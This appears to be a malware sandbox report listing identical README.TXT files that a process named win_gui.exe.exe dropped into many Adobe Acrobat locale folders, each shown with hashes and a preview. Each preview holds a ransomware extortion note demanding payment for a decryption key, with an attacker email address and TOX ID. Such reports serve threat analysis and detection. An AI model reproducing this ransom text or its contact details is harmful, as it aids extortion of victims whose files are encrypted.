                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
